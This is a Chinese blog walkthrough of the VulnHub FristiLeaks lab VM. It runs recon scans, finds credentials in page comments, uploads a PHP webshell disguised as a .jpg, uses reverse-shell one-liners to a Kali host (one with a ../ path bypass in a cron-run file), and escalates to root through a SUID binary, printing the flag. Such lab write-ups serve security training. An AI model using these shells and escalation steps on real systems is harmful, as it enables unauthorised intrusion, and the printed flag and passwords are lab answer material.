Vulnhub之FristiLeaks

vulnhub

字数统计: 1.2k阅读时长: 6 min

 2019/01/23   Share

0x01 靶机地址

https://www.vulnhub.com/entry/fristileaks-13,133/

0x02 环境搭建

下载好的voa导入VB中，将MAC地址改为08:00:27:A5:A6:76

靶机：192.168.1.174
Kali：192.168.1.139
win10：192.168.1.161

0x03 Play

1.信息收集

➜  ~ nmap -sS -p- -T4 -v -A 192.168.1.174
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating ARP Ping Scan at 19:53
Scanning 192.168.1.174 [1 port]
Completed ARP Ping Scan at 19:53, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:53
Completed Parallel DNS resolution of 1 host. at 19:53, 0.01s elapsed
Initiating SYN Stealth Scan at 19:53
Scanning 192.168.1.174 [65535 ports]
Discovered open port 80/tcp on 192.168.1.174
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

就只是开了一个80口的Web服务，所以只能从80下手了

2.目录扫描

➜  ~ dirb http://192.168.1.174 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

URL_BASE: http://192.168.1.174/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.174/ ----
+ http://192.168.1.174/cgi-bin/ (CODE:403|SIZE:210)                                             
==> DIRECTORY: http://192.168.1.174/images/                                                     
+ http://192.168.1.174/index.html (CODE:200|SIZE:703)                                           
+ http://192.168.1.174/robots.txt (CODE:200|SIZE:62)

发现了一个robots.txt

➜  ~ curl http://192.168.1.174/robots.txt
User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

找到了三个目录，但是访问都只有一个图片

3.Getshell

并没啥用…这时候来看主页面，试试fristi

有一个登录框，尝试了下弱口令，均无果。查看源代码，发现两个注释

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

拿到账号eezeepz，利用Submit将数据转为一行，然后解码

是一个PNG的图片。将其保存为PNG格式，然后查看。

应该是密码，keKkeKKeKKeKkEkkEk。然后登录系统，然后进来了。

只有一个uploadfile的功能，上传一句话

然后访问http://192.168.1.174/fristi/uploads/eval.php.jpg居然成功执行了

连菜刀，反弹Shell

1	bash -i >& /dev/tcp/192.168.1.139/1234 0>&1

查看文件时，在/home/eezeepz/notes.txt，找到了hint，并且存在用户fristigod

意思是说/tmp/runthis文件会定时以admin身份执行的，但是路径会有限制的然后报错

command did not start with /home/admin or /usr/bin

所以这里用../进行Bypass

1	/usr/bin/../../bin/bash -i >& /dev/tcp/192.168.1.139/12345 0>&1

一会后，成功返回Shell

4.提权

为了方便使用菜刀进行文件交互，这里将/home/admin目录设为777

1	/usr/bin/../../bin/chmod -R 777 /home/admin

拿到一个加密脚本和两个密文

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

#whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

#cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

加密并不复杂，写出解密

import base64,sys

def decode(str):
    str = str[::-1].encode('rot13')
    return base64.b64decode(str)

print decode(sys.argv[1])

这两个可能是密码。先找下属于fristigod的文件

1	find / -user fristigod 2>/dev/null

尝试切换为fristigod

bash-4.1$ python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod
bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -al
ls -al
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff

有一个Bash_history，看下历史命令

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

看样子是用SUID进行提权的，利用find查询下

bash-4.1$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping
/bin/ping6
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/passwd
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/sbin/suexec
/usr/sbin/usernetctl
/var/fristigod/.secret_admin_stuff/doCom

这里正好有那个/var/fristigod/.secret_admin_stuff/doCom文件，所以直接拿来提权

bash-4.1$ sudo -u fristi ./doCom /bin/bash
sudo -u fristi ./doCom /bin/bash
bash-4.1# whoami
whoami
root
bash-4.1# ls /root/
ls /root/
fristileaks_secrets.txt
bash-4.1# cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

成功GetShell

Next Post

浅谈Redis未授权攻击方式
Previous Post

Vulnhub之Billu_b0x

CATALOG

1. 0x01 靶机地址
2. 0x02 环境搭建
3. 0x03 Play

